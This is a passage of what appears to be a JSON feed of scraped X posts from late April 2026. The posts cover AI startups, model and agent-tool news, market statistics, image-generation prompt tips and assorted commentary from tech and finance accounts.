yet-to-be-founded than the one the labs are playing in.\n\nNow, what DOES seem risky?\n\nA thin UI layer on top of ChatGPT with no domain expertise; a general-purpose chatbot or assistant; or a product that gets obsolete when model capabilities improve.\n\nBut — tools for specific industries; \"full-stack\" AI companies that actually are the service (AI law firm, AI accounting firm, AI uranium exploration company); or generally products where the customer doesn't want a tool but an outcome — are defensible ideas for startups.", + "url": "https://x.com/paulg/status/2049333482271260710", + "published_at": "2026-04-29T03:42:31+00:00", + "source": "nitter", + "title_zh": "MIT学生指出,尽管OpenAI等科技巨头AI研发进展迅猛,但其在垂直领域应用仍存在局限,初创企业通过深耕细分市场与客户关系,可在AI发展过程中找到独特增长空间。" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: The exact same question to Grok 4.3, GPT 5.5, and Claude Opus 4.7:\n\n“Count to 10 starting from 11”\n\nGrok 4.3 wins 🏆\nEvery single time\n\nIt gave 11, 10 and explained why going backwards was the only logical move... The others started counting from 11 to 20\n\nGrok’s logical reasoning is at a level most models still can’t even touch", + "url": "https://x.com/elonmusk/status/2049332159601942995", + "published_at": "2026-04-29T03:37:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: What do the smartest kids in the world do when they grow up?\n\nI did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sharpest analytical minds of the world in high school, to see where they ended up and traced ~50% of them.\n\nFounders of ~20 unicorns and ~7 decacorns and ~10 billionaires: OpenAI, Cursor, Stripe, Databricks, Perplexity, Ethereum, Cognition, Hyperliquid, Fireworks, Modal, Quora, Parallel, Cartesia, Wispr\n\nMost kids went to MIT, a whopping 12% of them, followed by Cambridge (7%) and Sharif (3%)!\n\nThe career paths they chose (of those who graduated) were:\n— 36% Academia (professors)\n— 26% Other\n— 22% in Software / Tech\n— 12% in Quant / Finance\n— 5% Founders!\n\nThe biggest employer was Google, by far, at 6%.\nOthers interesting tidbits were:\n— 47 of them work at Jane Street (#3)\n— 38 at OpenAI (#5)\n— 15 at Anthropic\n— 8 at Cognition\n— 6 at Isomorphic Labs\n\nOlympiaders were 1500x more likely to be billionaires and 4000x more likely to be unicorn founders than the average person!", + "url": "https://x.com/paulg/status/2049330123464393084", + "published_at": "2026-04-29T03:29:10+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演示的视频,要求运镜丝滑\n\n注册体验领积分👉https://flowith.io?inv=TIECHUIREN,喜欢的可以试试", + "url": "https://x.com/lxfater/status/2049329956153352499", + "published_at": "2026-04-29T03:28:30+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https://flowith.io?inv=TIECHUIREN\n\n图片和视频提示词都在下一条👇", + "url": "https://x.com/lxfater/status/2049329950495310198", + "published_at": "2026-04-29T03:28:29+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年\n\n这条链路怎么跑起来,看我下面细细说来👇", + "url": "https://x.com/lxfater/status/2049329944052859141", + "published_at": "2026-04-29T03:28:28+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "4/29 AI 圈速览\n\n• OpenAI 全系正式登陆 AWS:GPT + Codex + 托管 Agent 一并上线\n\n• Anthropic 拒接军方合作,Google 顺势签下五角大楼新合同\n\n• Claude Code 系统提示 Bug:托管 Agent 失效 + 用户 token 被空转烧光\n\n• mattpocock 开源个人 .claude Skills 目录:工程师级实战合集\n\n• Composio 发布 awesome-codex-skills:Codex 跨平台自动化即插即用\n\n• Lovable Vibe Coding 上线 iOS/Android:手机随时建站建 App\n\n• Andrew Ng:AI 原生小团队工程师/PM 比从 8:1 压到 1:1\n\n• 论文:SFT 微调会破坏旧知识引发幻觉,持续学习技术或可解\n\n今天最值得盯紧的是 Skills 生态的三重爆发:Claude Code 的 Bug 暴露了 Managed Agent 的脆弱性,而 mattpocock 和 Composio 同日开源的两个 Skills 库恰好填补了空白——工具在进化,生产级 Skills 的稀缺正在成为真正的护城河。\n\n详情 👉 http://jasonzhu.ai/zh/news/2026-04-29", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546", + "published_at": "2026-04-29T03:20:42+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "🔥 今日新鲜 Skills 精选 Top 10(4月29日)\n由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀\n\nMozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!!\n\n1️⃣ mozilla-ai/any-llm\n⭐ 1928 | +1928\nMozilla AI 出品——一个接口跟所有 LLM provider 通信,挑战 LiteLLM\n🔗 https://github.com/mozilla-ai/any-llm\n🌐 https://agentskillshub.top/skill/mozilla-ai/any-llm/\n\n2️⃣ 🆕 nexu-io/open-design\n⭐ 1120 | +336\nAnthropic Claude Design 的本地化开源复刻,19 个 Skills + 71 个 brand-grade Designs\n🔗 https://github.com/nexu-io/open-design\n🌐 https://agentskillshub.top/skill/nexu-io/open-design/\n\n3️⃣ chainstacklabs/polyclaw\n⭐ 333 | +333\nPolymarket 交易 OpenClaw skill——浏览预测市场 + 执行交易 + 跟踪持仓\n🔗 https://github.com/chainstacklabs/polyclaw\n🌐 https://agentskillshub.top/skill/chainstacklabs/polyclaw/\n\n4️⃣ mkurman/zorai\n⭐ 294 | +294\n持久化、多 agent、可审计的学习型执行平台,daemon 守护 agent 协作\n🔗 https://github.com/mkurman/zorai\n🌐 https://agentskillshub.top/skill/mkurman/zorai/\n\n5️⃣ mcpware/cross-code-organizer\n⭐ 283 | +283\n跨 harness 的配置 dashboard——同时管 Claude Code/Codex/Cursor/Cline 配置\n🔗 https://github.com/mcpware/cross-code-organizer\n🌐 https://agentskillshub.top/skill/mcpware/cross-code-organizer/\n\n6️⃣ witchan/ios-mcp\n⭐ 217 | +217\niOS MCP for 越狱 iPhone——给开发者和 AI agent 的 iOS 设备管理\n🔗 https://github.com/witchan/ios-mcp\n🌐 https://agentskillshub.top/skill/witchan/ios-mcp/\n\n7️⃣ zhitongblog/solomd\n⭐ 193 | +193\nMarkdown editor + 内置 MCP server,本地优先,MIT,~15 MB\n🔗 https://github.com/zhitongblog/solomd\n🌐 https://agentskillshub.top/skill/zhitongblog/solomd/\n\n8️⃣ ghbalf/freecad-ai\n⭐ 167 | +167\nFreeCAD 的 AI workbench——自然语言生成 3D 模型\n🔗 https://github.com/ghbalf/freecad-ai\n🌐 https://agentskillshub.top/skill/ghbalf/freecad-ai/\n\n9️⃣ MinishLab/semble\n⭐ 112 | +86\n专为 Agent 设计的快速准确代码搜索引擎\n🔗 https://github.com/MinishLab/semble\n🌐 https://agentskillshub.top/skill/MinishLab/semble/\n\n🔟 🆕 trapoom555/claude-paperloom\n⭐ 47 | +4\nClaude Code 自维护学术知识图谱插件,对接 Obsidian\n🔗 https://github.com/trapoom555/claude-paperloom\n🌐 https://agentskillshub.top/skill/trapoom555/claude-paperloom/\n\n🎯 今日趋势:生态边界拓宽 — Mozilla(统一接口)/ Polymarket(金融预测)/ FreeCAD(3D 建模)/ iOS(移动越狱)/ Markdown 编辑器 / 学术知识图谱,全部有人在做 skill/MCP 接入 🔍", + "url": "https://x.com/GoSailGlobal/status/2049327853469310984", + "published_at": "2026-04-29T03:20:09+00:00", + "source": "nitter", + "title_zh": "Mozilla AI今日发布统一LLM通信接口any-llm,结合跨领域MCP生态扩张及超6.7万AI代理工具库的持续更新,推动开放模型应用边界进一步扩展。" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Gary, that was a great article. Wonderful work as always sir. You have been proven accurate once again.", + "url": "https://x.com/GaryMarcus/status/2049325506764677608", + "published_at": "2026-04-29T03:10:50+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "有做 摄影行业 的朋友吗,有个项目想聊一聊😊", + "url": "https://x.com/gkxspace/status/2049325117998592311", + "published_at": "2026-04-29T03:09:17+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "RT by @realNyarime: 基于大家的评论,看来大家都想要 token,所以这次我打算这样庆祝。\n\n关注我 @aiandcloud 并转发 + 评论这条内容,5 月 8 日开奖, 送 $100 GPT-5.5 API token,有效期两个月。\n如果活动期间到了 2K fo,就再加一个 $200 的名额,万一到 3K 就加个 $300 的也行!\n\n感谢大家的支持!🥰", + "url": "https://x.com/realNyarime/status/2049321411420811479", + "published_at": "2026-04-29T02:54:33+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the ability of this man to sell things he doesn’t believe in is truly extraordinary", + "url": "https://x.com/GaryMarcus/status/2049321182089081059", + "published_at": "2026-04-29T02:53:39+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "好消息:沪爷可以去金马了\n坏消息:需要到福建的出入境办大通证(往来台湾通行证)和签注", + "url": "https://x.com/realNyarime/status/2049317496361292240", + "published_at": "2026-04-29T02:39:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: at this point @ajambrosino is mogmogging\n\nenjoy the next few updates", + "url": "https://x.com/sama/status/2049315574120055054", + "published_at": "2026-04-29T02:31:21+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Image", + "url": "https://x.com/sama/status/2049314532892475791", + "published_at": "2026-04-29T02:27:13+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。\n\n听着像废话,但这个常识在 AI 时代变得尖锐——\n\n以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。\n\n护城河从\"代码会写\"变成\"策略会想\"。\n\n这件事我自己也在分层做——\n\npolymarket-toolkit 我开源(仓库https://github.com/runesleo/polymarket-toolkit),它解决的是数据采集、API 调用这类工具层的事。复用价值大,门槛低,开源等于做品牌。\n\nH 系列做市/taker 策略我不开源。里面是 sigmaD1 校准、做市 reprice 阈值、adverse selection 的实证参数。这些东西公开出来,相当于把研究路径直接送给同行——edge 一旦 commoditize 就没了,不管原来有没有 edge。\n\n中间还有一档:方法论可以写,具体参数不能写。pm-quant 付费源码包(https://leolabs.me/pm-quant)走的就是这层——19 个策略 + 加密 zip + 1on1 部署支持。付费门槛 = 过滤同行竞争。\n\n群里有人点 gabagool 这个高手地址:5min / 15min / 小时各级别都跑赢,\"不管行情都飞起\"。他的代码不在 github。市场已经用脚投票了。\n\n所以\"开源 bot 都亏钱\"是幸存者偏差决定的——能赚钱的人没有开源动机。你看到 ⭐ 几千、全是好评、作者还在持续更新的量化仓库,多半是个披着量化外壳的内容产品:开源是吸引订阅/付费的入口,不是核心收入。\n\n工具层开源、策略层闭源、方法论可分享、参数不可分享——这条线在 PM 量化圈里其实很清晰。\n\n护城河没消失,只是从\"代码会写\"换成\"策略会想\",从\"工具\"换成\"判断\"。\n\nPM 上扒数据 / 研究地址:https://polymarket.com/?r=runesleo&via=runes-leo&utm_source=x&utm_content=opensource-bot-moat&v…", + "url": "https://x.com/runes_leo/status/2049311708330459226", + "published_at": "2026-04-29T02:16:00+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "说个冷知识\n\n云服务厂商还是很有投资眼光的\n\n原价或者加价买了H100,现在还能卖那个价,甚至更高\n\n另外他还能出租5年保修期内的机器\n\n这不妥妥当下最具价值的投资品类嘛", + "url": "https://x.com/GoSailGlobal/status/2049307192692781200", + "published_at": "2026-04-29T01:58:03+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "R to @charliebilello: x.com/charliebilello/status/…", + "url": "https://x.com/charliebilello/status/2049306875301130507", + "published_at": "2026-04-29T01:56:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: #BREAKING: Chairman @Jim_Jordan invites Southern Poverty Law Center Interim CEO and President Bryan Fair to testify publicly on Wednesday, May 20, 2026, at 10:00 a.m.", + "url": "https://x.com/elonmusk/status/2049306669352358192", + "published_at": "2026-04-29T01:55:58+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "US home prices increased 0.7% over the last year, the slowest growth rate since June 2023. There are currently a record 46% more sellers than buyers nationally. Absent manipulation from the Federal Government/Reserve, prices will come down and homes will become more affordable.", + "url": "https://x.com/charliebilello/status/2049306480071873011", + "published_at": "2026-04-29T01:55:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", + "url": "https://x.com/dingyi/status/2049304499093946475", + "published_at": "2026-04-29T01:47:21+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", + "url": "https://x.com/gkxspace/status/2049302176900501544", + "published_at": "2026-04-29T01:38:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest in cash so you control dilution.\"\n\nTo what extent is SBC the crux of the problem and has it ever been a better time to be a founder or operator given this @honam @infoarbitrage @paulbonnet @markpinc", + "url": "https://x.com/HarryStebbings/status/2049298621951058341", + "published_at": "2026-04-29T01:24:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Since the start of the Iran war...\nJet Fuel: +70%\nSulfur: +60%\nBrent Crude Oil: +52%\nHeating Oil: +52%\nWTI Crude Oil: +48%\nUrea: +48%\nDiesel: +45%\nGasoline: +40%\nEuropean Nat Gas: +36%\nFertilizer: +23%\nPalm Oil: +12%\nCoal: +11%\nWheat: +10%\nIron Ore: +8%\nS&P 500: +4%\n$VIX: -10%", + "url": "https://x.com/charliebilello/status/2049298490489004357", + "published_at": "2026-04-29T01:23:28+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: 我和张凯的GEO论文,在全球最大的论文平台http://arxiv.org完成审核并正式发布\n这应该是全球第二篇与GEO有关的专项论文\n\n论文基于今年3月份最新的数据,包括602条 Prompt、21143 条引用、23745条AI抓取记录,最终形成的一版正式的GEO专项研究报告,欢迎查阅\n\n如果对大家能有帮助,我们打算后面继续抓取更多的数据,进行专项研究并开放研究成果\n\n网页地址:https://arxiv.org/abs/2604.25707\n论文PDF:https://arxiv.org/pdf/2604.25707\n\n源数据GitHub地址:https://github.com/yaojingang/geo-citation-lab", + "url": "https://x.com/GoSailGlobal/status/2049298176935690588", + "published_at": "2026-04-29T01:22:14+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "搭配收集免费模型的开源项目 使用这篇文章更佳\n\nhttps://github.com/cheahjs/free-llm-api-resources", + "url": "https://x.com/Pluvio9yte/status/2049296905382035945", + "published_at": "2026-04-29T01:17:10+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Following future rollout of FSD V14 Lite for HW3 vehicles in the US, we plan on expanding V14 Lite to additional international markets.\n\nThis update ensures that HW3 vehicle owners will continue to benefit from ongoing software updates.\n\nSince international rollout is subject to several factors (completion of technical verification, regional adaptation & relevant regulatory approvals), we can't provide definitive dates at the moment, but will provide updates on a rolling basis", + "url": "https://x.com/elonmusk/status/2049296822162874685", + "published_at": "2026-04-29T01:16:51+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "昨天试着申请了小米百万亿Token补贴,也收到了雷总送的7亿token,有效期一个月\n支持OpenAI和Anthropic端点,也有提供Claude Code等AI软件接入文档,看得出MiMo团队很用心在做这个事情\n\n接下来一个月,我会用MiMo V2.5对接OpenClaw尝试Vibe一个项目并开源,也期待国产LLM越做越好!", + "url": "https://x.com/realNyarime/status/2049296454905393361", + "published_at": "2026-04-29T01:15:23+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Big Zesty 💪", + "url": "https://x.com/jason/status/2049294394075849059", + "published_at": "2026-04-29T01:07:12+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204914647001…", + "url": "https://x.com/Pluvio9yte/status/2049293145670836459", + "published_at": "2026-04-29T01:02:14+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", + "url": "https://x.com/svwang1/status/2049289806241550791", + "published_at": "2026-04-29T00:48:58+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Ookla says @Starlink has been a game-changer for inflight Wi-Fi speeds. Their new report ranks which airline has the fastest Wi-Fi:\n\n\"Starlink stood out for its speed. Of over 50 airlines evaluated, the eight airlines that exceeded 100 Mbps median download speed and half of those clocking over 300 Mbps in 2H 2025 were served by Starlink. No other IFC provider approached triple-digit speeds. Conversely, no airline with Starlink was below 100 Mbps median download speed.\n\nThe consistency and download speed performance results of Starlink’s IFC are game changing. Sometimes when wireless networks experience rapid growth, the increased number of users and larger volume of data traffic can result in slower speeds for everyone. This has not been the case for Starlink.\"\n\nIt's pretty clear at this point that airlines not adopting Starlink are going to be at a pretty big disadvantage compared with the airlines that do. In some cases, we're already seeing passengers specifically searching for flights with Starlink Wi-Fi.", + "url": "https://x.com/elonmusk/status/2049283488600277368", + "published_at": "2026-04-29T00:23:52+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Super high bandwidth to commercial aircraft with @Starlink", + "url": "https://x.com/elonmusk/status/2049279898976702535", + "published_at": "2026-04-29T00:09:36+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Oh lordy... here comes the lawfare madness again 🤦\n\n86 when I grew up in the restaurant business meant “to get rid of” something (ie “86 clams” meant to take clams off the menu). \n\nI was told it had two origins:\n\n1. 86 Chumley's, which was the address of the speakeasy in Manhattan. They would 86 something on the menu there. \n\n2. I was also told it was eight feet long and six feet deep — like a grave.\n\nMy guess is they will unsuccessfully argue that @Comey intended the second definition—which is insane. \n\nComey obviously wasn’t telling folks to assassinate anyone and he apologized quickly for sharing the photo. \n https://x.com/nicksortor/status/2049223116052697589/video/1", + "url": "https://x.com/jason/status/2049278984513310783", + "published_at": "2026-04-29T00:05:58+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", + "url": "https://x.com/lxfater/status/2049278935897186512", + "published_at": "2026-04-29T00:05:46+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especially for public companies.\"\n\nDo you think that layoffs will solve the problem of many doing them @jasonlk @AnjneyMidha @GergelyOrosz @AustinGeorgas", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "published_at": "2026-04-29T00:05:00+00:00", + "source": "nitter", + "title_zh": "专家指出,单纯裁员难以解决企业架构臃肿问题,核心症结在于文化和人才质量,全面重组尤具挑战,上市公司尤甚。" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Not investment advice…. but WERE AT A FOUR YEAR HIGH AND WE CRUSHED EARNINGS 😂😂🤦😂😂\n\nNever change Philly!!!", + "url": "https://x.com/jason/status/2049275346109796388", + "published_at": "2026-04-28T23:51:30+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Google Gemma 官方教你本地跑 Coding Agent!\n\n本地完美组合来了:\n• Pi Agent\n• Gemma 4 26B 模型\n• LM Studio / Ollama / llama.cpp 等 serving engine\n\n完全离线运行、零 API 费用、100% 隐私保护、零延迟!本地开发者 Agentic 开发神器!\n\n附 @patloeber 详细一步步搭建教程👇\nhttps://patloeber.com/gemma-4-pi-agent/", + "url": "https://x.com/berryxia/status/2049275291164692726", + "published_at": "2026-04-28T23:51:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Lock in, GAME FIVE, @knicks fam!\n\n@BenStiller @jalenbrunson1 @Arifromanhattan \"\">@CPTheFanchise @jerryferrara @MrChuckD\n@RealChalamet @fredwilson @msavino\n@JDSportsTalkNY @nihalmehta @WorldWideWob\n@BillSimmons😂@JesseItzler @ajv 📷 @duglust @ischafer @sirgutz @Traticaster101 \n\nHow we feeling tonight?!?!\n\n📷cc some @ATLHawks fans please 📷 🫡", + "url": "https://x.com/jason/status/2049275070800150851", + "published_at": "2026-04-28T23:50:25+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 OpenBMB 重磅发布!MiniCPM-o 4.5 技术报告来了!\n\n9B 参数多模态模型实现突破性实时交互:\n\n• Omni-Flow 框架:原生全双工流式交互(视频+音频+文本毫秒级同步)\n\n• Native Full-Duplex + Proactive Interaction(无需VAD,可主动提醒)\n\n• 多模态基准接近 Gemini 2.5 Flash(MMBench 87.6 / MathVista 80.1)\n\n• 极致 Edge AI:完全离线运行,一键安装 Windows / macOS(12G VRAM 即可)\n\n• 100% 本地隐私 + 免费社区 API\n\n真正的实时、自然人机交互时代来了!🔥\n\n技术报告、GitHub、HuggingFace、Web Demo 已开放。", + "url": "https://x.com/berryxia/status/2049274065610027362", + "published_at": "2026-04-28T23:46:25+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "之前一直没搞清楚 GitHub 通知是怎么工作的。Star / Watch 各档到底推什么?摸清楚才发现很多人(包括我)一直在误解:star 根本不触发通知。\n\n- Star ⭐ = 书签,零通知\n- Watch (All Activity) = issue / PR / release / discussion / commit 评论,但单纯 push 不推\n- Watch (Releases only) = 只有打 tag 发 release 才推\n\n所以 star 在机制层就是个公开的\"值得存一下\"标签,不是订阅、不反映使用、甚至不代表看过。每次 push 的代码,第一时间能看到的只有 watcher 里那几个人。\n\n想真正跟进一个 repo:Watch + Releases only 最佳档。Watch All 太吵,Star 没用。", + "url": "https://x.com/runes_leo/status/2049271946022474215", + "published_at": "2026-04-28T23:38:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", + "url": "https://x.com/dingyi/status/2049262208241332358", + "published_at": "2026-04-28T22:59:18+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: GitHub:https://github.com/harflabs/SwiftVLC\n\n```", + "url": "https://x.com/berryxia/status/2049260222863266206", + "published_at": "2026-04-28T22:51:25+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这个老哥 写的SwiftVLC 正式开源啦!🔥\n\n现代 Swift 6 对 libVLC 的高质量 wrapper(驱动 Tilfaz 应用):\n\n• 直接 C bindings,无 Objective-C 桥接 \n• 严格并发支持(Strict Concurrency) \n• 专为 SwiftUI 量身打造 \n• 支持 iOS、macOS、tvOS、Mac Catalyst \n\n附带完整 Showcase App(40 个案例)和详细 DocC 文档!", + "url": "https://x.com/berryxia/status/2049260211895185445", + "published_at": "2026-04-28T22:51:22+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "GPT2 真的成精了!的确!\n小小东老哥整的这套提示词很不错,推荐大家!", + "url": "https://x.com/berryxia/status/2049259518027276559", + "published_at": "2026-04-28T22:48:37+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: The California Coastal Commission has issued a formal apology to @elonmusk and SpaceX, adding that it will not consider political views or speech in future regulatory decisions.\n\n• The Commission admits some officials made politically biased and improper statements about SpaceX and Elon Musk\n• It formally apologizes for those remarks\n• Agrees it will not consider political views or speech in future regulatory decisions\n• The Commission will NOT require coastal permits for most launch operations at Vandenberg\n\nFull statement: \"The Commission agrees that it may not consider irrelevant factors in performing its function and specifically agrees that it will not take into account the perceived political beliefs, political speech, or labor practices of SpaceX or its officers in considering any regulatory action concerning SpaceX. The Commission acknowledges that Commissioners made statements, including during their October 10, 2024, hearing on the Base’s Falcon 9 launch program, that showed political bias against SpaceX and its CEO and were improper. The Commission apologizes for those statements, as set forth in the signed letter attached as Exhibit C.\"\n\nThis filing means that SpaceX and the California Coastal Commission have reached a settlement in their federal lawsuit, and it provides long-term regulatory clarity for SpaceX for future Falcon 9 launches.", + "url": "https://x.com/elonmusk/status/2049259466973933764", + "published_at": "2026-04-28T22:48:24+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "3D 网格生成重磅突破!SATO 来了!\n\n• 从点云(Point Clouds)直接生成完整网格 \n• Strip-based tokenization,实现超干净边缘流与结构 \n• 原生 UV segmentation 直接 baked into 生成过程 \n• 单个模型同时支持三角网格 + 四边形网格", + "url": "https://x.com/berryxia/status/2049255217603178794", + "published_at": "2026-04-28T22:31:31+00:00", + "source": "nitter" + }, + { + 